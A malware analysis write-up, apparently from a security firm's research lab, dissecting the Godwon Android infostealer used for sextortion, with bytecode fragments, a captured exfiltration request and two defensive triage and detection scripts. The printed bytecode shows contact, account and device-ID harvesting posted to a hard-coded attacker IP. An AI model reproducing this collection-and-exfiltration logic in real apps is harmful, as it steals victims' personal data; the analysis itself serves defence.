Android InfoStealer – Godwon – Analysis

Analysis

From the description on contagio mobile, this Android InfoStealer malware, Godwon, is used by an online criminal group for ‘sextortion’. Honestly, I had never heard of this term before, but apparently it is a form of sexual exploitation that employs non-physical forms of coercion to extort sexual favors from the victim (Wikipedia).

The malware contains only one Activity and one Service, and requests permissions to read the phone state, access contacts and accounts, and connect to the Internet.

-> com.xinghai.contact.MainActivity
-> com.xinghai.contact.service.GogleService

The MainActivity performs only one operation: it creates a new Intent, uses it to start the ‘GogleService’, and then calls finish() on itself.

***************************************************************************
onCreate-BB@0x0 :
0 (00000000) invoke-super v2, v3, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
1 (00000006) new-instance v0, Landroid/content/Intent;
2 (0000000a) const-class v1, Lcom/xinghai/contact/service/GogleService;
3 (0000000e) invoke-direct v0, v2, v1, Landroid/content/Intent;-><init>(Landroid/content/Context; Ljava/lang/Class;)V
4 (00000014) invoke-virtual v2, v0, Lcom/xinghai/contact/MainActivity;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
5 (0000001a) invoke-virtual v2, Lcom/xinghai/contact/MainActivity;->finish()V
6 (00000020) return-void
***************************************************************************

Godwon attempts to access or create a SharedPreferences file, ‘abc.xml’, which it uses to track how many times it has been opened or how many times it has exfiltrated target data. The GogleService creates a TelephonyManager object through a call to getSystemService() with the argument ‘phone’, and uses this object to call getLine1Number() in order to obtain the victim’s phone number.

8 (0000001e) move-result-object v0
9 (00000020) check-cast v0, Landroid/telephony/TelephonyManager;
10 (00000024) iput-object v0, v4, Lcom/xinghai/contact/service/GogleService;->manager Landroid/telephony/TelephonyManager;
11 (00000028) iget-object v0, v4, Lcom/xinghai/contact/service/GogleService;->manager Landroid/telephony/TelephonyManager;
12 (0000002c) invoke-virtual v0, Landroid/telephony/TelephonyManager;->getLine1Number()Ljava/lang/String;
13 (00000032) move-result-object v0

It also subsequently calls getDeviceId() on the TelephonyManager object:

onCreate-BB@0x64 :
26 (00000064) iget-object v0, v4, Lcom/xinghai/contact/service/GogleService;->manager Landroid/telephony/TelephonyManager;
27 (00000068) invoke-virtual v0, Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/String;
28 (0000006e) move-result-object v0
29 (00000070) iput-object v0, v4, Lcom/xinghai/contact/service/GogleService;->number Ljava/lang/String; [ onCreate-BB@0x74 ]

It follows this with a check of the count stored in ‘abc.xml’ and, if the value does not match, branches into creating a new instance of itself (the anonymous inner class GogleService$1 seen in the listing below). Here is where it gets interesting! The service calls into a utility class named HttpTools, which it uses to collect contacts, Skype accounts, and so on. Obviously this directly correlates to the permissions it requested upon installation.

0 (00000000) const-string v4, 'tag'
1 (00000004) const-string v5, '2'
2 (00000008) invoke-static v4, v5, Landroid/util/Log;->e(Ljava/lang/String; Ljava/lang/String;)I
3 (0000000e) iget-object v4, v7, Lcom/xinghai/contact/service/GogleService$1;->this$0 Lcom/xinghai/contact/service/GogleService;
4 (00000012) invoke-static v4, Lcom/xinghai/contact/tools/HttpTools;->getContacts(Landroid/content/Context;)Ljava/lang/String;
5 (00000018) move-result-object v3
6 (0000001a) iget-object v4, v7, Lcom/xinghai/contact/service/GogleService$1;->this$0 Lcom/xinghai/contact/service/GogleService;
7 (0000001e) invoke-static v4, Lcom/xinghai/contact/tools/HttpTools;->getSkypeAcount(Landroid/content/Context;)Ljava/lang/String;
8 (00000024) move-result-object v0

You can see the getContacts() method querying the Contacts content provider (ContactsContract.Contacts.CONTENT_URI) through a ContentResolver in order to extract the contact information.

getContacts-BB@0x0 :
0 (00000000) const/4 v2, 0
1 (00000002) new-instance v13, Ljava/lang/StringBuilder;
2 (00000006) invoke-direct v13, Ljava/lang/StringBuilder;-><init>()V
3 (0000000c) invoke-virtual v15, Landroid/content/Context;->getContentResolver()Landroid/content/ContentResolver;
4 (00000012) move-result-object v0
5 (00000014) sget-object v1, Landroid/provider/ContactsContract$Contacts;->CONTENT_URI Landroid/net/Uri;
6 (00000018) move-object v3, v2
7 (0000001a) move-object v4, v2
8 (0000001c) move-object v5, v2
9 (0000001e) invoke-virtual/range v0, v1, v2, v3, v4, Landroid/content/ContentResolver;->query(Landroid/net/Uri; [Ljava/lang/String; Ljava/lang/String; [Ljava/lang/String; Ljava/lang/String;)Landroid/database/Cursor;
10 (00000024) move-result-object v7
11 (00000026) if-eqz v7, 172 [ getContacts-BB@0x2a getContacts-BB@0x17e ]

Within the getSkypeAcount() method (the misspelling is the malware author’s), it enumerates the accounts registered with the AccountManager and attempts to pull out your Skype account if you have one configured.

getSkypeAcount-BB@0x0 :
0 (00000000) invoke-static v9, Landroid/accounts/AccountManager;->get(Landroid/content/Context;)Landroid/accounts/AccountManager;
1 (00000006) move-result-object v3
2 (00000008) invoke-virtual v3, Landroid/accounts/AccountManager;->getAccounts()[Landroid/accounts/Account;
3 (0000000e) move-result-object v1
4 (00000010) new-instance v4, Ljava/lang/StringBuilder;
5 (00000014) invoke-direct v4, Ljava/lang/StringBuilder;-><init>()V
6 (0000001a) array-length v6, v1
7 (0000001c) const/4 v5, 0 [ getSkypeAcount-BB@0x1e ]
0:75
(Ljava/lang/Exception; -> 7c getSkypeAcount-BB@0x7c)

After everything is said and done, it is time for the exfiltration. Godwon takes all the collected data, builds a new Map, and calls the postUrl() method with a hard-coded endpoint address -> “http://118.193.205.164/saves.ashx”.

23 (00000062) invoke-interface v1, v4, v5, Ljava/util/Map;->put(Ljava/lang/Object; Ljava/lang/Object;)Ljava/lang/Object;
24 (00000068) const-string v4, 'sbid'
25 (0000006c) iget-object v5, v7, Lcom/xinghai/contact/service/GogleService$1;->this$0 Lcom/xinghai/contact/service/GogleService;
26 (00000070) invoke-static v5, Lcom/xinghai/contact/service/GogleService;->access$0(Lcom/xinghai/contact/service/GogleService;)Ljava/lang/String;
27 (00000076) move-result-object v5
28 (00000078) invoke-interface v1, v4, v5, Ljava/util/Map;->put(Ljava/lang/Object; Ljava/lang/Object;)Ljava/lang/Object;
29 (0000007e) const-string v4, 'http://118.193.205.164/saves.ashx'
30 (00000082) invoke-static v4, v1, Lcom/xinghai/contact/tools/HttpTools;->postUrl(Ljava/lang/String; Ljava/util/Map;)Ljava/lang/String;
31 (00000088) move-result-object v2
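The bytecode walk-through above (TelephonyManager, the Contacts content provider, AccountManager and the hard-coded postUrl() endpoint) can be turned into a quick static triage step. The script below is an added example, written for this write-up rather than taken from VerSprite's tooling or from the sample: it scans androguard-style listing text for framework references and string constants, maps the sensitive ones to the permission they imply, and pulls out any hard-coded URLs. The sample listing is constructed from lines quoted in this post, and the permission table is a small hypothetical mapping you would extend for your own triage.

```python
import re
from collections import defaultdict

# Constructed sample: androguard-style lines copied from the listings in this
# write-up (MainActivity.onCreate, GogleService.onCreate, the GogleService$1
# body and HttpTools.getContacts / getSkypeAcount).
SAMPLE_LISTING = """\
4 (00000014) invoke-virtual v2, v0, Lcom/xinghai/contact/MainActivity;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
12 (0000002c) invoke-virtual v0, Landroid/telephony/TelephonyManager;->getLine1Number()Ljava/lang/String;
27 (00000068) invoke-virtual v0, Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/String;
4 (00000012) invoke-static v4, Lcom/xinghai/contact/tools/HttpTools;->getContacts(Landroid/content/Context;)Ljava/lang/String;
5 (00000014) sget-object v1, Landroid/provider/ContactsContract$Contacts;->CONTENT_URI Landroid/net/Uri;
0 (00000000) invoke-static v9, Landroid/accounts/AccountManager;->get(Landroid/content/Context;)Landroid/accounts/AccountManager;
2 (00000008) invoke-virtual v3, Landroid/accounts/AccountManager;->getAccounts()[Landroid/accounts/Account;
29 (0000007e) const-string v4, 'http://118.193.205.164/saves.ashx'
30 (00000082) invoke-static v4, v1, Lcom/xinghai/contact/tools/HttpTools;->postUrl(Ljava/lang/String; Ljava/util/Map;)Ljava/lang/String;
"""

# Hypothetical minimal table: sensitive framework members and the Android
# permission each one implies. Extend for real triage.
SENSITIVE_APIS = {
    "Landroid/telephony/TelephonyManager;->getLine1Number": "READ_PHONE_STATE",
    "Landroid/telephony/TelephonyManager;->getDeviceId": "READ_PHONE_STATE",
    "Landroid/provider/ContactsContract$Contacts;->CONTENT_URI": "READ_CONTACTS",
    "Landroid/accounts/AccountManager;->getAccounts": "GET_ACCOUNTS",
}

# invoke-* and sget-object lines: capture the 'Lpkg/Class;->member' reference.
REF_RE = re.compile(r"\b(?:invoke-[\w/]+|sget-object)\b.*?\b(L[\w/$]+;->\w+)")
# const-string lines: capture the quoted literal.
STR_RE = re.compile(r"\bconst-string\b.*?'([^']*)'")
URL_RE = re.compile(r"^https?://", re.IGNORECASE)


def scan_listing(text):
    """Collect member references and string constants, in listing order."""
    refs, strings = [], []
    for line in text.splitlines():
        m = REF_RE.search(line)
        if m:
            refs.append(m.group(1))
        m = STR_RE.search(line)
        if m:
            strings.append(m.group(1))
    return refs, strings


def implied_permissions(refs):
    """Group sensitive references by the permission they imply."""
    perms = defaultdict(list)
    for ref in refs:
        if ref in SENSITIVE_APIS:
            perms[SENSITIVE_APIS[ref]].append(ref.rsplit("->", 1)[1])
    return dict(perms)


def hardcoded_urls(strings):
    """Filter string constants down to URL literals (candidate C2 endpoints)."""
    return [s for s in strings if URL_RE.match(s)]


def triage(text, app_prefix):
    """Summarise one listing: implied permissions, URLs and the app's own
    helper calls (those under app_prefix, e.g. 'Lcom/xinghai/')."""
    refs, strings = scan_listing(text)
    return {
        "permissions": implied_permissions(refs),
        "urls": hardcoded_urls(strings),
        "app_helpers": sorted({r for r in refs if r.startswith(app_prefix)}),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LISTING, "Lcom/xinghai/").items():
        print(f"{key}: {value}")
```

Running it against the sample prints the three permissions the post lists (phone state, contacts, accounts), the single hard-coded endpoint, and the app's own HttpTools helpers; cross-checking the implied set against the permissions declared in the manifest is a cheap way to spot what a sample intends to touch before running it.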

When we execute Godwon in our sandboxed environment behind an HTTP proxy, we can capture the outbound request. Note that the Host header in this capture (118.193.178.15) does not match the address hard-coded in the bytecode above (118.193.205.164), so both should be treated as indicators.

POST /saves.ashx HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.3; Malware VM Build/JLS36G)
Host: 118.193.178.15
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

smscontent=<br/>&sbid=15555215554&sign=key7974538k459945k45
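The capture above, turned into a detection check as an added example (written for this write-up, not VerSprite's tooling and not part of the malware): it parses a raw HTTP request, scores it against the indicators this post gives (both addresses, the /saves.ashx path and the smscontent/sbid/sign parameter set) and pulls the exfiltrated fields out into an alert record. The captured request is re-typed from the post with CRLF line endings; the benign request is constructed as a negative control, and the Content-Length comparison only sanity-checks the capture itself.

```python
from urllib.parse import parse_qs

# Constructed sample: the request captured through the HTTP proxy in this
# write-up, re-typed with CRLF line endings (values exactly as shown there).
CAPTURED_REQUEST = (
    "POST /saves.ashx HTTP/1.1\r\n"
    "User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.3; Malware VM Build/JLS36G)\r\n"
    "Host: 118.193.178.15\r\n"
    "Connection: Keep-Alive\r\n"
    "Accept-Encoding: gzip\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 59\r\n"
    "\r\n"
    "smscontent=<br/>&sbid=15555215554&sign=key7974538k459945k45"
)

# Constructed benign request used as a negative control.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Host: www.example.com\r\n"
    "\r\n"
)

# Indicators taken from this write-up: the endpoint hard-coded in the bytecode
# and the host observed in the proxy capture.
KNOWN_C2_HOSTS = {"118.193.205.164", "118.193.178.15"}
C2_PATH = "/saves.ashx"
# Parameter set the beacon carries, as seen in the captured body.
EXFIL_PARAMS = {"smscontent", "sbid", "sign"}


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into request line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def match_godwon_beacon(raw):
    """Score one request against the Godwon indicators and extract the
    exfiltrated fields; the result is shaped as an alert record."""
    req = parse_http_request(raw)
    headers = req["headers"]
    reasons = []

    host = headers.get("host", "")
    if host in KNOWN_C2_HOSTS:
        reasons.append(f"known C2 host {host}")
    if req["method"] == "POST" and req["path"] == C2_PATH:
        reasons.append(f"POST to {C2_PATH}")

    fields = {}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        # keep_blank_values so an empty smscontent (no contacts) still shows up
        parsed = parse_qs(req["body"], keep_blank_values=True)
        fields = {k: v[0] for k, v in parsed.items()}
        if EXFIL_PARAMS.issubset(fields):
            reasons.append("Godwon parameter set (smscontent/sbid/sign)")

    # Sanity check on the capture itself: declared vs. actual body length.
    declared = int(headers.get("content-length", "0"))
    length_ok = declared == len(req["body"].encode("utf-8"))

    return {
        "alert": bool(reasons),
        "reasons": reasons,
        "host": host,
        "victim_number": fields.get("sbid", ""),
        "sign": fields.get("sign", ""),
        "payload_bytes": len(fields.get("smscontent", "")),
        "length_ok": length_ok,
    }


if __name__ == "__main__":
    for name, raw in (("captured", CAPTURED_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, match_godwon_beacon(raw))
```

The host match alone is enough to alert, but the path and parameter-set checks are what keep the rule useful if the operators move to a new address: a proxy log line that posts smscontent/sbid/sign to saves.ashx is the behaviour, not the infrastructure.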

Protect Your Assets from Various Threat Actors

VerSprite’s Research and Development division (a.k.a VS-Labs) is comprised of individuals who are passionate about diving into the internals of various technologies.
